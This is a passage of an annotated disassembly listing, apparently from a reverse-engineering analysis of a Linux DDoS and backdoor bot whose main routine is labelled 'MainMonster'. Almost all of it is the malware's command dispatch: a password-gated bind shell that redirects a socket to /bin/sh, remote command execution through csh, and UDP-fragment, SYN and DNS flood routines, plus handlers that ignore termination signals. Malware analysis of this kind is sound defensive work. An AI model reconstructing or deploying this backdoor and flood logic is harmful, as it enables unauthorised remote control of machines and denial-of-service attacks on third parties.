24h ; Add .text:080487C0 push 0 ; int .text:080487C2 call sys_exit ; Call Procedure .text:080487C2 .text:080487C7 nop ; No Operation .text:080487C8 .text:080487C8 Sw4_TransmitUDP_A: ; CODE XREF: MainMonster+1F1j .text:080487C8 ; DATA XREF: MainMonster+1F8o .text:080487C8 cmp ds:gProc_ID, 0 ; case 0x4 .text:080487CF jnz Exit_Switch_Loop_Listen ; default .text:080487CF .text:080487D5 .text:080487D5 ChildProc_Sw4: .text:080487D5 mov ds:gSwitch_Num, 5 .text:080487DF call fork ; Call Procedure .text:080487DF .text:080487E4 mov ds:gProc_ID, eax .text:080487E9 test eax, eax ; Logical Compare .text:080487EB jnz Exit_Switch_Loop_Listen ; default .text:080487EB .text:080487F1 .text:080487F1 Transmit_UDP_A: ; Load Effective Address .text:080487F1 lea edi, [ebp+DestBuf] .text:080487F7 lea esi, [ebp+PayloadBuf] ; Load Effective Address .text:080487FD cld ; Clear Direction Flag .text:080487FE mov ecx, 63 ; ECX = 252 .text:08048803 repe movsd ; Move Byte(s) from String to String .text:08048805 movsw ; Move Byte(s) from String to String .text:08048807 movsb ; Move Byte(s) from String to String .text:08048808 xor ebx, ebx ; Logical Exclusive OR .text:0804880A lea esi, [esi] ; Load Effective Address .text:0804880C .text:0804880C Shift_Left_Payload_13: ; CODE XREF: MainMonster+6EDj .text:0804880C mov al, [ebx+ebp+DestBuf+13] .text:08048813 mov [ebx+ebp+DestBuf], al .text:0804881A inc ebx ; Increment by 1 .text:0804881B cmp ebx, 254 ; Compare Two Operands .text:08048821 jle short Shift_Left_Payload_13 ; Jump if Less or Equal (ZF=1 | SF!=OF) .text:08048821 .text:08048823 lea eax, [ebp+DestBuf] ; Load Effective Address .text:08048829 push eax ; Str_HostName .text:0804882A movzx eax, [ebp+PayloadBuf+0Ch] ; Move with Zero-Extend .text:08048831 push eax ; bProcess .text:08048832 movzx eax, [ebp+PayloadBuf+0Bh] ; Move with Zero-Extend .text:08048839 push eax ; SrcIP_3 .text:0804883A movzx eax, [ebp+PayloadBuf+0Ah] ; Move with Zero-Extend .text:08048841 push eax ; SrcIP_2 .text:08048842 movzx eax, [ebp+PayloadBuf+9] ; Move with Zero-Extend .text:08048849 push eax ; SrcIP_1 .text:0804884A movzx eax, [ebp+PayloadBuf+8] ; Move with Zero-Extend .text:08048851 push eax ; SrcIP_0 .text:08048852 movzx eax, [ebp+PayloadBuf+7] ; Move with Zero-Extend .text:08048859 push eax ; DestIP_3 .text:0804885A movzx eax, [ebp+PayloadBuf+6] ; Move with Zero-Extend .text:08048861 push eax ; DestIP_2 .text:08048862 movzx eax, [ebp+PayloadBuf+5] ; Move with Zero-Extend .text:08048869 push eax ; DestIP_1 .text:0804886A movzx eax, [ebp+PayloadBuf+4] ; Move with Zero-Extend .text:08048871 push eax ; DestIP_0 .text:08048872 movzx eax, [ebp+PayloadBuf+3] ; Move with Zero-Extend .text:08048879 push eax ; Dst_Port .text:0804887A movzx eax, [ebp+PayloadBuf+2] ; Move with Zero-Extend .text:08048881 push eax ; bSrcPortDefined .text:08048882 call frag_Attack_ ; Call Procedure .text:08048882 .text:08048887 add esp, 30h ; Add .text:0804888A push 0 ; int .text:0804888C call sys_exit ; Call Procedure .text:0804888C .text:08048891 lea esi, [esi+0] ; Load Effective Address .text:08048894 .text:08048894 Sw5_Remote_Shell: ; CODE XREF: MainMonster+1F1j .text:08048894 ; DATA XREF: MainMonster+1F8o .text:08048894 cmp ds:gProc_ID, 0 ; case 0x5 .text:0804889B jnz Exit_Switch_Loop_Listen ; default .text:0804889B .text:080488A1 mov ds:gSwitch_Num, 6 .text:080488AB push SIG_IGN ; NewSigHandler .text:080488AD push SIGCHLD ; SigNum .text:080488AF call signal ; CALL HANDLERS WERE SET TO SIG_IGN (0x1) .text:080488AF ; SO PROGRAM PROTECTING ITSELF from some calls. .text:080488AF .text:080488B4 call fork ; Call Procedure .text:080488B4 .text:080488B9 mov ds:gProc_ID, eax .text:080488BE add esp, 8 ; Add .text:080488C1 test eax, eax ; Logical Compare .text:080488C3 jnz Exit_Switch_Loop_Listen ; default .text:080488C3 .text:080488C9 .text:080488C9 Child_Proc: ; Call Procedure .text:080488C9 call setsid .text:080488C9 .text:080488CE push SIG_IGN ; NewSigHandler .text:080488D0 push SIGCHLD ; SigNum .text:080488D2 call signal ; CALL HANDLERS WERE SET TO SIG_IGN (0x1) .text:080488D2 ; SO PROGRAM PROTECTING ITSELF from some calls. .text:080488D2 .text:080488D7 mov [ebp+SockAddr.sin_family], 2 .text:080488E0 add esp, 8 ; Add .text:080488E3 mov [ebp+SockAddr.sin_port], 0F15Ah .text:080488EC mov dword ptr [ebp+SockAddr.sin_addr.S_un], 0 .text:080488F6 mov [ebp+OptionValue], 1 .text:08048900 push 0 ; protocol .text:08048902 push 1 ; type .text:08048904 push 2 ; af .text:08048906 call socket ; Call Procedure .text:08048906 .text:0804890B mov [ebp+socket_id2_stream], eax .text:08048911 push SIG_IGN ; NewSigHandler .text:08048913 push SIGCHLD ; SigNum .text:08048915 call signal ; CALL HANDLERS WERE SET TO SIG_IGN (0x1) .text:08048915 ; SO PROGRAM PROTECTING ITSELF from some calls. .text:08048915 .text:0804891A push SIG_IGN ; NewSigHandler .text:0804891C push SIGCHLD ; SigNum .text:0804891E call signal ; CALL HANDLERS WERE SET TO SIG_IGN (0x1) .text:0804891E ; SO PROGRAM PROTECTING ITSELF from some calls. .text:0804891E .text:08048923 push SIG_IGN ; NewSigHandler .text:08048925 push SIGHUP ; SigNum .text:08048927 call signal ; CALL HANDLERS WERE SET TO SIG_IGN (0x1) .text:08048927 ; SO PROGRAM PROTECTING ITSELF from some calls. .text:08048927 .text:0804892C add esp, 24h ; Add .text:0804892F push SIG_IGN ; NewSigHandler .text:08048931 push SIGTERM ; SigNum .text:08048933 call signal ; CALL HANDLERS WERE SET TO SIG_IGN (0x1) .text:08048933 ; SO PROGRAM PROTECTING ITSELF from some calls. .text:08048933 .text:08048938 push SIG_IGN ; NewSigHandler .text:0804893A push SIGINT ; SigNum .text:0804893C call signal ; CALL HANDLERS WERE SET TO SIG_IGN (0x1) .text:0804893C ; SO PROGRAM PROTECTING ITSELF from some calls. .text:0804893C .text:08048941 push 4 ; optlen .text:08048943 lea eax, [ebp+OptionValue] ; Load Effective Address .text:08048949 push eax ; optval .text:0804894A push 2 ; optname .text:0804894C push 1 ; level .text:0804894E mov ecx, [ebp+socket_id2_stream] .text:08048954 push ecx ; s .text:08048955 call setsockopt ; Call Procedure .text:08048955 .text:0804895A add esp, 24h ; Add .text:0804895D push 10h ; namelen .text:0804895F lea eax, [ebp+SockAddr] ; Load Effective Address .text:08048965 push eax ; name .text:08048966 mov edx, [ebp+socket_id2_stream] .text:0804896C push edx ; s .text:0804896D call bind ; Call Procedure .text:0804896D .text:08048972 push 3 ; backlog .text:08048974 mov ecx, [ebp+socket_id2_stream] .text:0804897A push ecx ; s .text:0804897B call listen ; Call Procedure .text:0804897B .text:08048980 add esp, 14h ; Add .text:08048983 nop ; No Operation .text:08048984 .text:08048984 ForkParent: ; CODE XREF: MainMonster+882j .text:08048984 lea eax, [ebp+SockLen] ; Load Effective Address .text:0804898A push eax ; addrlen .text:0804898B lea eax, [ebp+pPeerSockAddr] ; Load Effective Address .text:08048991 push eax ; addr .text:08048992 mov edx, [ebp+socket_id2_stream] .text:08048998 push edx ; s .text:08048999 call accept ; Call Procedure .text:08048999 .text:0804899E mov [ebp+socket_id], eax .text:080489A4 add esp, 0Ch ; Add .text:080489A7 test eax, eax ; Logical Compare .text:080489A9 jz FailSocket ; Jump if Zero (ZF=1) .text:080489A9 .text:080489AF call fork ; Call Procedure .text:080489AF .text:080489B4 test eax, eax ; Logical Compare .text:080489B6 jnz short ForkParent ; Jump if Not Zero (ZF=0) .text:080489B6 .text:080489B8 .text:080489B8 Child_Proc2: ; flags .text:080489B8 push 0 .text:080489BA push 13h ; len .text:080489BC lea eax, [ebp+Buffer[12772]] ; Load Effective Address .text:080489C2 push eax ; buf .text:080489C3 mov ecx, [ebp+socket_id] .text:080489C9 push ecx ; s .text:080489CA call recv ; Call Procedure .text:080489CA .text:080489CF xor ebx, ebx ; Logical Exclusive OR .text:080489D1 add esp, 10h ; Add .text:080489D4 .text:080489D4 Compare_Recv: ; CODE XREF: MainMonster+8CEj .text:080489D4 mov al, [ebx+ebp+Buffer[12772]] .text:080489DB cmp al, 0Ah ; Compare Two Operands .text:080489DD jz short Convert_A_to_0 ; Jump if Zero (ZF=1) .text:080489DD .text:080489DF cmp al, 0Dh ; Compare Two Operands .text:080489E1 jnz short If_Not_D_INC_1 ; Jump if Not Zero (ZF=0) .text:080489E1 .text:080489E3 .text:080489E3 Convert_A_to_0: ; CODE XREF: MainMonster+8A9j .text:080489E3 mov [ebx+ebp+Buffer[12772]], 0 .text:080489EB jmp short Continue ; Jump .text:080489EB .text:080489EB ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ .text:080489ED align 4 .text:080489F0 .text:080489F0 If_Not_D_INC_1: ; CODE XREF: MainMonster+8ADj .text:080489F0 mov [ebx+ebp+Buffer[12772]], al .text:080489F7 inc [ebx+ebp+Buffer[12772]] ; Increment by 1 .text:080489FE .text:080489FE Continue: ; CODE XREF: MainMonster+8B7j .text:080489FE inc ebx ; Increment by 1 .text:080489FF cmp ebx, 12h ; Compare Two Operands .text:08048A02 jle short Compare_Recv ; Jump if Less or Equal (ZF=1 | SF!=OF) .text:08048A02 .text:08048A04 .text:08048A04 CompareWith_TfOjG_0: ; Load Effective Address .text:08048A04 lea esi, [ebp+Buffer[12772]] .text:08048A0A mov edi, offset aTfojg ; "TfOjG" .text:08048A0F mov ecx, 6 .text:08048A14 cld ; Clear Direction Flag .text:08048A15 test al, 0 ; Logical Compare .text:08048A17 repe cmpsb ; Compare Strings .text:08048A19 jz short Cmd_Shell ; ?Redirect shell IO to socket? .text:08048A19 .text:08048A1B push 0 ; flags .text:08048A1D push 4 ; len .text:08048A1F push offset buf ; buf .text:08048A24 mov edx, [ebp+socket_id] .text:08048A2A push edx ; s .text:08048A2B call send ; Call Procedure .text:08048A2B .text:08048A30 mov ecx, [ebp+socket_id] .text:08048A36 push ecx .text:08048A37 call close ; Call Procedure .text:08048A37 .text:08048A3C push 1 .text:08048A3E call exit ; Call Procedure .text:08048A3E .text:08048A43 nop ; No Operation .text:08048A44 .text:08048A44 Cmd_Shell: ; CODE XREF: MainMonster+8E5j .text:08048A44 push 0 ; ?Redirect shell IO to socket? .text:08048A46 mov edx, [ebp+socket_id] .text:08048A4C push edx .text:08048A4D call dup2 ; Call Procedure .text:08048A4D .text:08048A52 push 1 .text:08048A54 mov ecx, [ebp+socket_id] .text:08048A5A push ecx .text:08048A5B call dup2 ; Call Procedure .text:08048A5B .text:08048A60 push 2 .text:08048A62 mov edx, [ebp+socket_id] .text:08048A68 push edx .text:08048A69 call dup2 ; Call Procedure .text:08048A69 .text:08048A6E push 1 ; overwrite .text:08048A70 push offset aSbinBinUsrSbin ; value .text:08048A75 push offset aPath ; name .text:08048A7A call setenv ; Call Procedure .text:08048A7A .text:08048A7F add esp, 24h ; Add .text:08048A82 push offset aHistfile ; char * .text:08048A87 call getenv_ ; Call Procedure .text:08048A87 .text:08048A8C push 1 ; overwrite .text:08048A8E push offset aLinux ; value .text:08048A93 push offset aTerm ; name .text:08048A98 call setenv ; Call Procedure .text:08048A98 .text:08048A9D push 0 .text:08048A9F push offset aSh ; "sh" .text:08048AA4 push offset aBinSh ; "/bin/sh" .text:08048AA9 call execv ; Call Procedure .text:08048AA9 .text:08048AAE mov ecx, [ebp+socket_id] .text:08048AB4 push ecx .text:08048AB5 call close ; Call Procedure .text:08048AB5 .text:08048ABA add esp, 20h ; Add .text:08048ABD push 0 .text:08048ABF call exit ; Call Procedure .text:08048ABF .text:08048AC4 .text:08048AC4 FailSocket: ; CODE XREF: MainMonster+875j .text:08048AC4 push 0 .text:08048AC6 call exit ; Call Procedure .text:08048AC6 .text:08048ACB nop ; No Operation .text:08048ACC .text:08048ACC Sw6_Exec_Command: ; CODE XREF: MainMonster+1F1j .text:08048ACC ; DATA XREF: MainMonster+1F8o .text:08048ACC call fork ; case 0x6 .text:08048ACC .text:08048AD1 mov ds:gPid, eax .text:08048AD6 test eax, eax ; Logical Compare .text:08048AD8 jnz Exit_Switch_Loop_Listen ; default .text:08048AD8 .text:08048ADE .text:08048ADE ChildProc: ; Call Procedure .text:08048ADE call setsid .text:08048ADE .text:08048AE3 push SIG_IGN ; NewSigHandler .text:08048AE5 push SIGCHLD ; SigNum .text:08048AE7 call signal ; CALL HANDLERS WERE SET TO SIG_IGN (0x1) .text:08048AE7 ; SO PROGRAM PROTECTING ITSELF from some calls. .text:08048AE7 .text:08048AEC call fork ; Call Procedure .text:08048AEC .text:08048AF1 add esp, 8 ; Add .text:08048AF4 test eax, eax ; Logical Compare .text:08048AF6 jz short Child_2 ; Jump if Zero (ZF=1) .text:08048AF6 .text:08048AF8 .text:08048AF8 Kill_Parent: .text:08048AF8 push 4B0h .text:08048AFD call sleep ; Call Procedure .text:08048AFD .text:08048B02 push 9 .text:08048B04 mov eax, ds:gPid .text:08048B09 push eax .text:08048B0A call kill ; Call Procedure .text:08048B0A .text:08048B0F push 0 .text:08048B11 call exit ; Call Procedure .text:08048B11 .text:08048B16 lea esi, [esi] ; Load Effective Address .text:08048B18 .text:08048B18 Child_2: ; CODE XREF: MainMonster+9C2j .text:08048B18 xor ebx, ebx ; Logical Exclusive OR .text:08048B1A lea esi, [esi] ; Load Effective Address .text:08048B1C .text:08048B1C Shift_Left_Payload_2: ; CODE XREF: MainMonster+9FDj .text:08048B1C mov al, [ebx+ebp+PayloadBuf+2] .text:08048B23 mov [ebx+ebp+PayloadBuf], al .text:08048B2A inc ebx ; Increment by 1 .text:08048B2B cmp ebx, 18Dh ; Compare Two Operands .text:08048B31 jle short Shift_Left_Payload_2 ; Jump if Less or Equal (ZF=1 | SF!=OF) .text:08048B31 .text:08048B33 mov edx, [ebp+pPayloadBuf] .text:08048B39 push edx .text:08048B3A push offset aBinCshFCS ; "/bin/csh -f -c \"%s\" " .text:08048B3F lea ebx, [ebp+RecvBuf] ; Load Effective Address .text:08048B45 push ebx .text:08048B46 call sprintf ; Call Procedure .text:08048B46 .text:08048B4B push ebx ; char * .text:08048B4C call system ; Call Procedure .text:08048B4C .text:08048B51 push 0 ; int .text:08048B53 call sys_exit ; Call Procedure .text:08048B53 .text:08048B58 .text:08048B58 Sw7_Kill_Parent_Process: ; CODE XREF: MainMonster+1F1j .text:08048B58 ; DATA XREF: MainMonster+1F8o .text:08048B58 mov eax, ds:gProc_ID ; case 0x7 .text:08048B5D test eax, eax ; Logical Compare .text:08048B5F jz Exit_Switch_Loop_Listen ; default .text:08048B5F .text:08048B65 .text:08048B65 Kill_Parent_Sw7: .text:08048B65 push 9 .text:08048B67 push eax .text:08048B68 call kill ; Call Procedure .text:08048B68 .text:08048B6D mov ds:gProc_ID, 0 .text:08048B77 add esp, 8 ; Add .text:08048B7A jmp Exit_Switch_Loop_Listen ; default .text:08048B7A .text:08048B7A ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ .text:08048B7F align 4 .text:08048B80 .text:08048B80 Sw8_Query_Root?8: ; CODE XREF: MainMonster+1F1j .text:08048B80 ; DATA XREF: MainMonster+1F8o .text:08048B80 cmp ds:gProc_ID, 0 ; case 0x8 .text:08048B87 jnz Exit_Switch_Loop_Listen ; default .text:08048B87 .text:08048B8D mov ds:gSwitch_Num, 9 .text:08048B97 call fork ; Call Procedure .text:08048B97 .text:08048B9C mov ds:gProc_ID, eax .text:08048BA1 test eax, eax ; Logical Compare .text:08048BA3 jnz Exit_Switch_Loop_Listen ; default .text:08048BA3 .text:08048BA9 .text:08048BA9 Child_Proc_Sw8: ; Load Effective Address .text:08048BA9 lea edi, [ebp+DestBuf] .text:08048BAF lea esi, [ebp+PayloadBuf] ; Load Effective Address .text:08048BB5 cld ; Clear Direction Flag .text:08048BB6 mov ecx, 63 ; 252 .text:08048BBB repe movsd ; Move Byte(s) from String to String .text:08048BBD movsw ; Move Byte(s) from String to String .text:08048BBF movsb ; Move Byte(s) from String to String .text:08048BC0 xor ebx, ebx ; Logical Exclusive OR .text:08048BC2 lea esi, [esi] ; Load Effective Address .text:08048BC4 .text:08048BC4 SHL_DestBuf_10: ; CODE XREF: MainMonster+AA5j .text:08048BC4 mov al, [ebx+ebp+DestBuf+10] .text:08048BCB mov [ebx+ebp+DestBuf], al .text:08048BD2 inc ebx ; Increment by 1 .text:08048BD3 cmp ebx, 254 ; Compare Two Operands .text:08048BD9 jle short SHL_DestBuf_10 ; Jump if Less or Equal (ZF=1 | SF!=OF) .text:08048BD9 .text:08048BDB lea eax, [ebp+DestBuf] ; Load Effective Address .text:08048BE1 push eax .text:08048BE2 movzx eax, [ebp+PayloadBuf+9] ; Move with Zero-Extend .text:08048BE9 push eax .text:08048BEA movzx eax, [ebp+PayloadBuf+8] ; Move with Zero-Extend .text:08048BF1 push eax .text:08048BF2 movzx eax, [ebp+PayloadBuf+7] ; Move with Zero-Extend .text:08048BF9 push eax .text:08048BFA movzx eax, [ebp+PayloadBuf+6] ; Move with Zero-Extend .text:08048C01 push eax .text:08048C02 movzx eax, [ebp+PayloadBuf+5] ; Move with Zero-Extend .text:08048C09 push eax .text:08048C0A movzx eax, [ebp+PayloadBuf+4] ; Move with Zero-Extend .text:08048C11 push eax .text:08048C12 movzx eax, [ebp+PayloadBuf+3] ; Move with Zero-Extend .text:08048C19 push eax .text:08048C1A movzx eax, [ebp+PayloadBuf+2] ; Move with Zero-Extend .text:08048C21 push eax .text:08048C22 call DNS_Query_Attack ; Call Procedure .text:08048C22 .text:08048C27 add esp, 24h ; Add .text:08048C2A push 0 ; int .text:08048C2C call sys_exit ; Call Procedure .text:08048C2C .text:08048C31 lea esi, [esi+0] ; Load Effective Address .text:08048C34 .text:08048C34 Sw9_Send_SYN: ; CODE XREF: MainMonster+1F1j .text:08048C34 ; DATA XREF: MainMonster+1F8o .text:08048C34 cmp ds:gProc_ID, 0 ; case 0x9 .text:08048C3B jnz Exit_Switch_Loop_Listen ; default .text:08048C3B .text:08048C41 mov ds:gSwitch_Num, 0Ah .text:08048C4B call fork ; Call Procedure .text:08048C4B .text:08048C50 mov ds:gProc_ID, eax .text:08048C55 test eax, eax ; Logical Compare .text:08048C57 jnz Exit_Switch_Loop_Listen ; default .text:08048C57 .text:08048C5D .text:08048C5D Child: ; Load Effective Address .text:08048C5D lea edi, [ebp+DestBuf] .text:08048C63 lea esi, [ebp+PayloadBuf] ; Load Effective Address .text:08048C69 cld ; Clear Direction Flag .text:08048C6A mov ecx, 63 .text:08048C6F repe movsd ; Move Byte(s) from String to String .text:08048C71 movsw ; Move Byte(s) from String to String .text:08048C73 movsb ; Move Byte(s) from String to String .text:08048C74 xor ebx, ebx ; Logical Exclusive OR .text:08048C76 lea esi, [esi] ; Load Effective Address .text:08048C78 .text:08048C78 SHL14_DestBuf: ; CODE XREF: MainMonster+B59j .text:08048C78 mov al, [ebx+ebp+DestBuf+14] .text:08048C7F mov [ebx+ebp+DestBuf], al .text:08048C86 inc ebx ; Increment by 1 .text:08048C87 cmp ebx, 254 ; Compare Two Operands .text:08048C8D jle short SHL14_DestBuf ; Jump if Less or Equal (ZF=1 | SF!=OF) .text:08048C8D .text:08048C8F lea eax, [ebp+DestBuf] ; Load Effective Address .text:08048C95 push eax .text:08048C96 movzx eax, [ebp+PayloadBuf+0Dh] ; Move with Zero-Extend .text:08048C9D push eax .text:08048C9E push 0 .text:08048CA0 movzx eax, [ebp+PayloadBuf+0Ch] ; Move with Zero-Extend .text:08048CA7 push eax .text:08048CA8 movzx eax, [ebp+PayloadBuf+0Bh] ; Move with Zero-Extend .text:08048CAF push eax .text:08048CB0 movzx eax, [ebp+PayloadBuf+0Ah] ; Move with Zero-Extend .text:08048CB7 push eax .text:08048CB8 movzx eax, [ebp+PayloadBuf+9] ; Move with Zero-Extend .text:08048CBF push eax .text:08048CC0 movzx eax, [ebp+PayloadBuf+8] ; Move with Zero-Extend .text:08048CC7 push eax .text:08048CC8 movzx eax, [ebp+PayloadBuf+7] ; Move with Zero-Extend .text:08048CCF push eax .text:08048CD0 movzx eax, [ebp+PayloadBuf+6] ; Move with Zero-Extend .text:08048CD7 push eax .text:08048CD8 movzx eax, [ebp+PayloadBuf+5] ; Move with Zero-Extend .text:08048CDF push eax .text:08048CE0 movzx eax, [ebp+PayloadBuf+4] ; Move with Zero-Extend .text:08048CE7 push eax .text:08048CE8 movzx eax, [ebp+PayloadBuf+3] ; Move with Zero-Extend .text:08048CEF push eax .text:08048CF0 movzx eax, [ebp+PayloadBuf+2] ; Move with Zero-Extend .text:08048CF7 push eax .text:08048CF8 call SYN_Attack ; Call Procedure .text:08048CF8 .text:08048CFD add esp, 38h ; Add .text:08048D00 push 0 ; int .text:08048D02 call sys_exit ; Call Procedure .text:08048D02 .text:08048D07 nop ; No Operation .text:08048D08 .text:08048D08 SwA_Send_SYN__: ; CODE XREF: MainMonster+1F1j .text:08048D08 ; DATA XREF: MainMonster+1F8o .text:08048D08 cmp ds:gProc_ID, 0 ; case 0xa .text:08048D0F jnz Exit_Switch_Loop_Listen ; default .text:08048D0F .text:08048D15 mov ds:gSwitch_Num, 0Bh .text:08048D1F call fork ; Call Procedure .text:08048D1F .text:08048D24 mov ds:gProc_ID, eax .text:08048D29 test eax, eax ; Logical Compare .text:08048D2B jnz Exit_Switch_Loop_Listen ; default .text:08048D2B .text:08048D31 .text:08048D31 Parent: ; Load Effective Address .text:08048D31 lea edi, [ebp+DestBuf] .text:08048D37 lea esi, [ebp+PayloadBuf] ; Load Effective Address .text:08048D3D cld ; Clear Direction Flag .text:08048D3E mov ecx, 63 .text:08048D43 repe movsd ; Move Byte(s) from String to String .text:08048D45 movsw ; Move Byte(s) from String to String .text:08048D47 movsb ; Move Byte(s) from String to String .text:08048D48 xor ebx, ebx ; Logical Exclusive OR .text:08048D4A lea esi, [esi] ; Load Effective Address .text:08048D4C .text:08048D4C SHL15_DestBuf: ; CODE XREF: MainMonster+C2Dj .text:08048D4C mov al, [ebx+ebp+DestBuf+15] .text:08048D53 mov [ebx+ebp+DestBuf], al .text:08048D5A inc ebx ; Increment by 1 .text:08048D5B cmp ebx, 254 ; Compare Two Operands .text:08048D61 jle short SHL15_DestBuf ; Jump if Less or Equal (ZF=1 | SF!=OF) .text:08048D61 .text:08048D63 lea eax, [ebp+DestBuf] ; Load Effective Address .text:08048D69 push eax .text:08048D6A movzx eax, [ebp+PayloadBuf+0Eh] ; Move with Zero-Extend .text:08048D71 push eax .text:08048D72 movzx eax, [ebp+PayloadBuf+0Dh] ; Move with Zero-Extend .text:08048D79 push eax .text:08048D7A movzx eax, [ebp+PayloadBuf+0Ch] ; Move with Zero-Extend .text:08048D81 push eax .text:08048D82 movzx eax, [ebp+PayloadBuf+0Bh] ; Move with Zero-Extend .text:08048D89 push eax .text:08048D8A movzx eax, [ebp+PayloadBuf+0Ah] ; Move with Zero-Extend .text:08048D91 push eax .text:08048D92 movzx eax, [ebp+PayloadBuf+9] ; Move with Zero-Extend .text:08048D99 push eax .text:08048D9A movzx eax, [ebp+PayloadBuf+8] ; Move with Zero-Extend .text:08048DA1 push eax .text:08048DA2 movzx eax, [ebp+PayloadBuf+7] ; Move with Zero-Extend .text:08048DA9 push eax .text:08048DAA movzx eax, [ebp+PayloadBuf+6] ; Move with Zero-Extend .text:08048DB1 push eax .text:08048DB2 movzx eax, [ebp+PayloadBuf+5] ; Move with Zero-Extend .text:08048DB9 push eax .text:08048DBA movzx eax, [ebp+PayloadBuf+4] ; Move with Zero-Extend .text:08048DC1 push eax .text:08048DC2 movzx eax, [ebp+PayloadBuf+3] ; Move with Zero-Extend .text:08048DC9 push eax .text:08048DCA movzx eax, [ebp+PayloadBuf+2] ; Move with Zero-Extend .text:08048DD1 push eax .text:08048DD2 call SYN_Attack ; Call Procedure .text:08048DD2 .text:08048DD7 add esp, 38h ; Add .text:08048DDA push 0 ; int .text:08048DDC call sys_exit ; Call Procedure .text:08048DDC .text:08048DE1 lea esi, [esi+0] ; Load Effective Address .text:08048DE4 .text:08048DE4 SwB_DNS_Attack: ; CODE XREF: MainMonster+1F1j .text:08048DE4 ; DATA XREF: MainMonster+1F8o .text:08048DE4 cmp ds:gProc_ID, 0 ; case 0xb .text:08048DEB jnz Exit_Switch_Loop_Listen ; default .text:08048DEB .text:08048DF1 mov ds:gSwitch_Num, 0Ch .text:08048DFB call fork ; Call Procedure .text:08048DFB .text:08048E00 mov ds:gProc_ID, eax .text:08048E05 test eax, eax ; Logical Compare .text:08048E07 jnz Exit_Switch_Loop_Listen ; default .text:08048E07 .text:08048E0D .text:08048E0D Parent_: ; Load Effective Address .text:08048E0D lea edi, [ebp+DestBuf] .text:08048E13 lea esi, [ebp+PayloadBuf] ; Load Effective Address .text:08048E19 cld ; Clear Direction Flag .text:08048E1A mov ecx, 63 .text:08048E1F repe movsd ; Move Byte(s) from String to String .text:08048E21 movsw ; Move Byte(s) from String to String .text:08048E23 movsb ; Move Byte(s) from String to String .text:08048E24 xor ebx, ebx ; Logical Exclusive OR .text:08048E26 lea esi, [esi] ; Load Effective Address .text:08048E28 .text:08048E28 SHL14__DestBuf: ; CODE XREF: MainMonster+D09j .text:08048E28 mov al, [ebx+ebp+DestBuf+14] .text:08048E2F mov [ebx+ebp+DestBuf], al .text:08048E36 inc ebx ; Increment by 1 .text:08048E37 cmp ebx, 254 ; Compare Two Operands .text:08048E3D jle short SHL14__DestBuf ; Jump if Less or Equal (ZF=1 | SF!=OF) .text:08048E3D .text:08048E3F lea eax, [ebp+DestBuf] ; Load Effective Address .text:08048E45 push eax .text:08048E46 movzx eax, [ebp+PayloadBuf+0Dh] ; Move with Zero-Extend .text:08048E4D push eax .text:08048E4E movzx eax, [ebp+PayloadBuf+0Ch] ; Move with Zero-Extend .text:08048E55 push eax .text:08048E56 movzx eax, [ebp+PayloadBuf+0Bh] ; Move with Zero-Extend .text:08048E5D push eax .text:08048E5E movzx eax, [ebp+PayloadBuf+0Ah] ; Move with Zero-Extend .text:08048E65 push eax .text:08048E66 movzx eax, [ebp+PayloadBuf+9] ; Move with Zero-Extend .text:08048E6D push eax .text:08048E6E movzx eax, [ebp+PayloadBuf+8] ; Move with Zero-Extend .text:08048E75 push eax .text:08048E76 movzx eax, [ebp+PayloadBuf+7] ; Move with Zero-Extend .text:08048E7D push eax .text:08048E7E movzx eax, [ebp+PayloadBuf+6] ; Move with Zero-Extend .text:08048E85 push eax .text:08048E86 movzx eax, [ebp+PayloadBuf+5] ; Move with Zero-Extend .text:08048E8D push eax .text:08048E8E movzx eax, [ebp+PayloadBuf+4] ; Move with Zero-Extend .text:08048E95 push eax .text:08048E96 movzx eax, [ebp+PayloadBuf+3] ; Move with Zero-Extend .text:08048E9D push eax .text:08048E9E movzx eax, [ebp+PayloadBuf+2] ; Move with Zero-Extend .text:08048EA5 push eax .text:08048EA6 call DNS_Attack_DNSServer ; NumPerLoop = 40000 .text:08048EA6 ; No of packets = NumPerLoop x NumOfLoop .text:08048EA6 .text:08048EAB add esp, 34h ; Add .text:08048EAE push 0 ; int .text:08048EB0 call sys_exit ; Call Procedure .text:08048EB0 .text:08048EB5 lea esi, [esi+0] ; Load Effective Address .text:08048EB8 .text:08048EB8 Exit_Switch_Loop_Listen: ; CODE XREF: MainMonster+1A5j .text:08048EB8 ; MainMonster+1B4j .text:08048EB8 ; MainMonster+1C0j .text:08048EB8 ; MainMonster+1EBj .text:08048EB8 ; MainMonster+2B7j .text:08048EB8 ; MainMonster+412j .text:08048EB8 ; MainMonster+454j .text:08048EB8 ; MainMonster+468j .text:08048EB8 ; MainMonster+5EFj .text:08048EB8 ; MainMonster+60Bj .text:08048EB8 ; MainMonster+69Bj .text:08048EB8 ; MainMonster+6B7j .text:08048EB8 ; MainMonster+767j .text:08048EB8 ; MainMonster+78Fj .text:08048EB8 ; MainMonster+9A4j .text:08048EB8 ; MainMonster+A2Bj .text:08048EB8 ; MainMonster+A46j .text:08048EB8 ; MainMonster+A53j .text:08048EB8 ; MainMonster+A6Fj .text:08048EB8 ; MainMonster+B07j ... .text:08048EB8 push 2710h ; default .text:08048EBD call _usleep ; Call Procedure .text:08048EBD .text:08048EC2 add esp, 4 ; Add .text:08048EC5 jmp ListenForPacketB ; Jump .text:08048EC5 .text:08048EC5 MainMonster endp